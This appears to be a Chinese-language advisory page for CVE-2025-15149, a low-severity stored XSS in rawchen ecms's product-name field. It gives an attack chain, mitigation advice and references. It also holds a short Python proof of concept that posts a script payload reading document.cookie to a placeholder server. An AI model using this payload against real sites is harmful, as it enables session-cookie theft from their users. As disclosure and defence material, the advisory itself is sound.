CVE-2025-15149 rawchen ecms updateProductServlet XSS漏洞

漏洞信息

漏洞编号

CVE-2025-15149

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

rawchen ecms

漏洞概述

CVE-2025-15149是rawchen ecms中的一个存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞存在于产品管理功能的updateProductServlet中，攻击者可以通过在添加新产品页面的productName参数中注入恶意JavaScript代码。由于该漏洞被分类为存储型XSS，恶意脚本会被永久存储在服务器端，所有访问该产品信息的用户都会受到攻击影响。漏洞需要攻击者具有高权限（产品管理权限）才能利用，且需要诱导其他用户进行交互操作（如访问产品列表页面）。CVSS评分仅为2.4，属于低危级别，主要因为其需要高权限和用户交互才能成功利用。

技术细节

该漏洞位于src/servlet/product/updateProductServlet.java文件中的Add New Product页面功能模块。攻击者通过操纵productName参数，注入恶意JavaScript代码或HTML标签。由于系统未对用户输入进行充分的输入验证和输出编码，恶意脚本会被直接存储到数据库中。当其他用户（如管理员或普通用户）访问包含该产品信息的页面时，浏览器会解析并执行存储的恶意脚本。攻击者可利用此漏洞窃取用户会话Cookie、进行钓鱼攻击、篡改页面内容或诱导用户执行其他操作。漏洞利用前提条件包括：1）攻击者需具有产品管理权限；2）需要诱导受害者访问受影响页面；3）系统未部署有效的XSS防护机制（如WAF、输入过滤等）。

攻击链分析

STEP 1

1

攻击者获取rawchen ecms系统的高权限账户（如产品管理员）

STEP 2

2

攻击者构造包含恶意JavaScript代码的productName参数，注入XSS payload

STEP 3

3

攻击者通过updateProductServlet接口提交恶意数据，payload被存储到数据库

STEP 4

4

受害者（如普通用户或管理员）访问产品列表或详情页面

STEP 5

5

浏览器解析页面时执行存储的恶意脚本，攻击者窃取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-15149 XSS PoC - Stored XSS in productName parameter // Target: rawchen ecms updateProductServlet // Author: [email protected] import requests import json target_url = "http://target-server.com/ecms/src/servlet/product/updateProductServlet" # Malicious payload for XSS in productName parameter xss_payload = "<script>alert(document.cookie)</script>" # Prepare the POST request with XSS payload data = { "productName": xss_payload, # Other required parameters may include: # "productDesc": "Description", # "productPrice": "100", # "productStock": "50", # Add other form parameters as required } # Send the malicious request (requires high privilege) response = requests.post(target_url, data=data) # Check if the payload was stored if response.status_code == 200: print("[+] XSS payload sent successfully") print("[*] Payload stored in productName field") print("[*] Any user viewing this product will trigger the XSS") else: print("[-] Request failed") # The stored XSS will be triggered when accessing: # - Product list page # - Product detail page # - Admin product management page

影响范围

rawchen ecms < b59d7feaa9094234e8aa6c8c6b290621ca575ded

防御指南

临时缓解措施

在系统层面部署XSS防护措施，包括：1）启用Web应用防火墙规则过滤XSS特征；2）对产品名称等用户可控字段实施严格的输入白名单验证；3）在所有输出点实施HTML编码；4）配置严格的Content-Security-Policy响应头限制脚本执行；5）限制具有产品管理权限的用户范围并监控其操作日志。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15149
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15149
3 Details https://www.cvedetails.com/cve/CVE-2025-15149/
4 VulDB https://vuldb.com/cve/CVE-2025-15149
5 Link https://github.com/zyhzheng500-maker/cve/blob/main/%E5%AD%98%E5%82%A8%E5%9E%8BXss.md
6 Link https://vuldb.com/?ctiid.338526
7 Link https://vuldb.com/?id.338526
8 Link https://vuldb.com/?submit.716583